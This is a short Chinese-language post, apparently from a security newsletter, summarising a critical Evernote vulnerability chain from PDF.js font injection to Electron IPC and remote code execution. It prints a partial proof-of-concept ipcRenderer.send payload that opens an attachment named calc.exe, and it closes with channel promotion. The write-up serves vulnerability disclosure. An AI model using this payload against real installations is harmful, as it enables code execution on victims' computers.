一句话总结(点击原文跳转)
主要描述了一个在Evernote应用中发现的关键性漏洞,该漏洞可以通过嵌入恶意PDF文件到笔记中,利用PDF.js的字体注入进行JavaScript代码执行,进而通过Electron的ipcRenderer和BrokerBridge实现跨进程通信,最终达到远程代码执行(RCE)的攻击链。
关键信息点
//部分poc
window.top.electronApi.ipcRenderer.send('BrokerBridge', {action: 'Bridge/Call',id: '7e803824-d666-4ffe-9ebb-39ac1bd7856f',topics: 'boron.actions.openFileAttachment',data:{'resource': {'hash':'2f82623f9523c0d167862cad0eff6806','mime': 'application/octet-stream','rect': {'left': 68,'top': 155,'width': 728.1428833007812,'height': 43.42857360839844},'state': 'loaded','reference': '22cad1af-d431-4af6-b818-0e34f9ff150b','selected': true,'url': 'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','isInk': false,'filesize': 45056,'filename': 'calc.exe'},'url':'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','noteGuid': 'f4cbd0d2-f670-52a7-7ea7-5720d65614fd','appName': ''}})
某知名安全大V,昨日印象笔记被黑
延伸阅读
最近的小玩意
部分能力后期会开放,比如知识库/迪斯科等,星球身份应该是后期各服务的通行证
AI目前比较贵,为了可持续发展,设置了星球的地板价25元(系统最低价)
red4blue
,备注加群)